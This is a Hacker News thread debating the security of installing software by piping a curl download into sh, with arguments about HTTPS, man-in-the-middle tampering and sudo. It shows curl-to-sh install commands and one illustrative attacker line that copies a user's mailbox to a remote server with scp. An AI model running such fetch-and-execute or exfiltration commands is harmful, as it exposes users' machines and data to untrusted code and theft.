Hacker News new | past | comments | ask | show | jobs | submit login

Why is this bad? I get why it seems offensive, but how is running a random shell script from some host any different than running some random software downloaded and installed from the same host? Anything malicious that the shell script could do could also be done by the software itself once installed, no? If they're from the same official source, why should one be considered more trustworthy than the other?

EDIT: Okay, I see it's because of the use of sudo. But graphical installers often require the root/administrator password, and could be equally destructive.




If you download an installer from an https:// link, even though you still aren't capital-S Secure, you're still more secure than running shell scripts spat out over TCP port 80.


So would,

    curl https://get.pow.cx/ | sh
Fix your complaint? Like the grandparent said, I'm not sure why curl | sh is any less secure than gem install or whathaveyou, in the oh-god-this-script-just-ran-rm-rf-/ sense.


It would improve the situation but I'm still not a fan of perpetuating the pipe-into-shell idiom.


The only meaningful difference between the two techniques is the extra step required to explicitly execute an installer. Is that your objection, that you don't like something being automatically executed upon download?


HTTPS, automatic installation, and UX that confounds security for end-users are my three objections to this gimmick.


I really don't see what's to object about. People who care about security can review it. People who just want it to work and don't care about security will blindly execute whatever instructions are written on the site. If the app is malicious then the latter group is screwed no matter what, doesn't matter whether it's 'curl | sh' or whether it's a .dmg/.zip/.tar.gz.


Your HTTPS suggestion makes sense, but can you explain your other two points by contrasting with "gem install"? How is the installation any more automatic? How does the UX confound security?


I was assuming HTTPS based on this thread chain, but even in practice, most installers I see aren't downloaded over HTTPS.

How does this practice confound security more than a normal installer? sudo asks for my password just as a normal installer would.


It's easier for a man in the middle to change a 15-line text script than to change a binary. Lowering that effort = increasing the odds and incidence of attempted attacks.


I request one thing, you send me something completely different. I don't see how making the "something" an ASCII script makes it easier than a random binary (and there's no requirement that the random binary has any relationship with what I requested).

Oddly, I'm more used to seeing arguments that distributing source code is better than distributing binaries because you can inspect source code.


The scenario isn't that I send you something different, but that somebody else gets in between us and tampers with the data. That's what https tries to avoid.

We're arguing levels of badness here so it's a little hokey. But if you decide to open up your machine to run arbitrary code, a machine that can run shell will arguably get more infections than one that runs executables. To infect the ladder any script kiddies will need to know a 'harder' language and at least how to compile it. It's a couple more hoops to jump through. In the other case I could drive by and do scp ~/mailbox me@myserver:


"Tampers with the data" is functionally equivalent to sending me something different. There's not requirement that it looks like what I requested at all, and as long as it will execute when double-clicked, it'll do the trick.

We're already talking about running arbitrary code on a machine, compiled versus interpreted is irrelevant. And I think you have forgotten that a script with the appropriate hash-bang and file permissions is indistinguishable to most users from a compiled executable.


Rubygems at least has a post-install hook that gem authors can execute automatically.


Just let me know when I can do: port selfupdate; port info ...


I thought everyone moved over to homebrew now :)


Sure, but a huge amount of software is distributed over plain old HTTP anyway. I agree that we should be using HTTPS for things like this, but I don't buy that curling a shell script is worse than downloading an installer over an unencrypted connection.


If you want https you can install from github:

curl https://github.com/37signals/pow/raw/master/install.sh | sh


No you're not! It's the same security issue.

You can for example, at your network level point get.pow.cx to a malicious script and you're done. That's the security issue, it has nothing to do with the HTTP protocol.

With that being said, I don't care, the risk is the same as downloading any software via http, in fact I loved it, so easy :-).


In fact it's much more transparent. With a compiled binary you don't see the steps involved, with a bash script you can step line by line and see exactly what the script is doing.

Those that don't care won't look at the script any more than they'll check the md5 hash of a binary to see that it's a legit binary. For those that care, they can look at the bash source.


Sorry, I just don't agree with this, but I also recognize it as a topic that we can nerd out over for hours and hours without improving the universe even a little. If what 'tptacek thinks about the security of software distribution means anything to you --- I'm not saying it has to --- then know that I think this is a bad idea that is only not causing problems because it is a gimmick used by so few projects.


I'm really, really trying to understand your viewpoint on this. How is this any more insecure than downloading (over HTTP) and running a graphical installer that requires your root password? Is it just because it takes a bit more effort to exploit a binary, given a MitM position, or am I missing something else?


We get that you think it is a bad idea, but don't know/understand why/how?

Since you are the security expert at Hn, we are trying to understand/learn from you.

This is not plain Nerdgasm making people understand about software security is making the world a little better.


You mean DNS spoofing. That only works if you can get a valid certificate at one of the recognized CAs. If you use a self-signed one curl will still complain unless -k is given. But then again, after the Comodo fiasco...





Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: